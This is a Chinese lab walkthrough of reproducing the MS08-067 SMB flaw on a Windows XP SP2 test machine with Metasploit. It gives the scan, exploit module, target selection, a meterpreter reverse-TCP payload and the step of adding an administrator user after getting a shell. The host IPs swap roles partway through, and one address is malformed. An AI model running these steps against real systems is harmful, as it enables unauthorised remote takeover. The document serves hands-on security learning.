MS08_067漏洞

MS08_067漏洞也是在445端口上被攻击者利用,MS17_010利用的是445端口上的网络共享和远程文件的服务,而这次的MS08_067利用的是在远程调用过程中,函数出现的逻辑性错误,从而造成缓冲区溢出。

1.漏洞复现

1.1 复现环境

靶机:windows xp sp2 IP:192.168.1.133
攻击机:kali-linux-2020.2 IP:192.168.1.131

1.2 复现流程
  • sudo msfconsole
    在这里插入图片描述
1.3 扫描目标靶机
  • nmap -sS 192.168.1.131
    在这里插入图片描述
    通过nmap 扫描发现 目标靶机的445端口处于打开状态,而ms08_067针对的就是445端口上的远程调用过程。
1.4 搜索漏洞
  • search ms08_067
    在这里插入图片描述
1.5 使用ms08_067漏洞
  • use exploit/windows/smb/ms08_067_netapi
  • show options
    在这里插入图片描述
    设置RHOSTS 192.1681.131
1.6 选择目标系统
  • set RHOSTS 192.168.1.131
  • show targets
  • set target 10
    在这里插入图片描述
    根据目标靶机的系统选择target,我的目标靶机是windows xp sp2 所以选择 target 10
1.7 设置payload
  • use payload/windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.133
  • show options
    在这里插入图片描述
    选择payload 来处理攻击后与靶机通信的问题,这里选择的是反向tcp连接,攻击后目标靶机会向攻击机发送连接请求
1.8 攻击靶机
  • exploit
    在这里插入图片描述
    攻击结果已经获取到了目标系统的shell,提权可以使用windows命令 添加用户并将用户添加进管理员组。
Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐